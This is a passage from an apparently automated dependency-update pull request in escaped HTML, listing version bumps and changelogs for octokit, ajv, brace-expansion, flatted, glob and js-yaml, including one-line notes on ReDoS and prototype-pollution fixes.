(2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.0...v9.2.1\"\u003e9.2.1\u003c/a\u003e (2024-03-01)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e5b84386\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.0\"\u003e9.2.0\u003c/a\u003e (2024-02-22)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/users\u003c/code\u003e endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/594\"\u003e#594\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e75aeaaf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e\u003ccode\u003e5b84386\u003c/code\u003e\u003c/a\u003e fix(pkg): pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/fa01f94c624b3b67f6ef687c80865773a1c99676\"\u003e\u003ccode\u003efa01f94\u003c/code\u003e\u003c/a\u003e ci(action): update actions/add-to-project action to v0.6.0 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/598\"\u003e#598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e\u003ccode\u003e75aeaaf\u003c/code\u003e\u003c/a\u003e feat: new \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and `/orgs/{org}/o...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/54d6bcfef756e5b329d817ce5ad3f92885a00a7d\"\u003e\u003ccode\u003e54d6bcf\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/1bfa2f8d338158db33af812168bbfad9d8af4f00\"\u003e\u003ccode\u003e1bfa2f8\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency npm-run-all2 to v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/eb4a8fe643a368ef3d68f8901d551638230581e1\"\u003e\u003ccode\u003eeb4a8fe\u003c/code\u003e\u003c/a\u003e chore(deps): replace dependency npm-run-all with npm-run-all2 ^5.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/11ef7798c8519e8446a92605d4e4bd2008a42c07\"\u003e\u003ccode\u003e11ef779\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/2b6cc98c51e0816a2873ea5d6e6b4edb01d2e9b9\"\u003e\u003ccode\u003e2b6cc98\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/d7c9de5bb0366b61666c1270138ce93059c3402a\"\u003e\u003ccode\u003ed7c9de5\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.4 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/588\"\u003e#588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 5.0.1 to 5.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003e5.1.1\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e12a14f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.0.1...v5.1.0\"\u003e5.1.0\u003c/a\u003e (2024-04-05)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade \u003ccode\u003e@octokit/types\u003c/code\u003e to v13 (\u003ca href=\"https://github.com/octokit/request-error.js/commit/3af20bd58fea6cc349bc191c725e78e9cc021da6\"\u003e3af20bd\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/416\"\u003e#416\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/94147e8843898e0edd2664d0c46a4f42eb4adaa4\"\u003e94147e8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b51ed2766807a5ca59b5ba477762e84171ccca53\"\u003e\u003ccode\u003eb51ed27\u003c/code\u003e\u003c/a\u003e test: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e\u003ccode\u003e12a14f0\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/3af20bd58fea6cc349bc191c725e78e9cc021da6\"\u003e\u003ccode\u003e3af20bd\u003c/code\u003e\u003c/a\u003e fix: upgrade \u003ccode\u003e@octokit/types\u003c/code\u003e to v13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/94147e8843898e0edd2664d0c46a4f42eb4adaa4\"\u003e\u003ccode\u003e94147e8\u003c/code\u003e\u003c/a\u003e feat(security): Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/416\"\u003e#416\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.0.1...v5.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.1.6 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.4.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.1...v8.4.0\"\u003e8.4.0\u003c/a\u003e (2024-04-09)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ere-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003eabc4955\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/599\"\u003e#599\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.3.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.0...v8.3.1\"\u003e8.3.1\u003c/a\u003e (2024-04-05)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade \u003ccode\u003e@octokit/endpoint\u003c/code\u003e (\u003ca href=\"https://github.com/octokit/request.js/commit/4e7127cff05fbd091306168af341a9bb7d443045\"\u003e4e7127c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.3.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.2.0...v8.3.0\"\u003e8.3.0\u003c/a\u003e (2024-04-05)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://github.com/octokit/request.js/commit/6822e8bbaa74bc177e14fabfa54e94e7f13edc68\"\u003e6822e8b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/685\"\u003e#685\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/2e6792585f64da58d735c0dda2811bf9cff0ac0e\"\u003e2e67925\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.1.6...v8.2.0\"\u003e8.2.0\u003c/a\u003e (2024-02-09)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd documentation link in error message (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/667\"\u003e#667\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/dbfeab2ff9d4e7b5eaf7d155b1c4cdd630928753\"\u003edbfeab2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003e\u003ccode\u003eabc4955\u003c/code\u003e\u003c/a\u003e feat: re-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/4e7127cff05fbd091306168af341a9bb7d443045\"\u003e\u003ccode\u003e4e7127c\u003c/code\u003e\u003c/a\u003e fix: upgrade \u003ccode\u003e@octokit/endpoint\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/2e6792585f64da58d735c0dda2811bf9cff0ac0e\"\u003e\u003ccode\u003e2e67925\u003c/code\u003e\u003c/a\u003e feat(security): Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/6822e8bbaa74bc177e14fabfa54e94e7f13edc68\"\u003e\u003ccode\u003e6822e8b\u003c/code\u003e\u003c/a\u003e fix: upgrade \u003ccode\u003e@octokit/types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/dbfeab2ff9d4e7b5eaf7d155b1c4cdd630928753\"\u003e\u003ccode\u003edbfeab2\u003c/code\u003e\u003c/a\u003e feat: add documentation link in error message (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/667\"\u003e#667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/c013de4e24a01e0776661e46ba60fcf0d4670389\"\u003e\u003ccode\u003ec013de4\u003c/code\u003e\u003c/a\u003e docs: fix spelling errors (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/671\"\u003e#671\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/3d22c38bc0ed14fa5ff4a732bb62bee9b62fb5e6\"\u003e\u003ccode\u003e3d22c38\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/984ec173e6dda48c4c1cd39666b8e6e2e3abfa7e\"\u003e\u003ccode\u003e984ec17\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/2a9cf786e8f3b2f900fbb06a4545d959b9fff318\"\u003e\u003ccode\u003e2a9cf78\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.1.6...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.9 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.9...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.4.5 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for 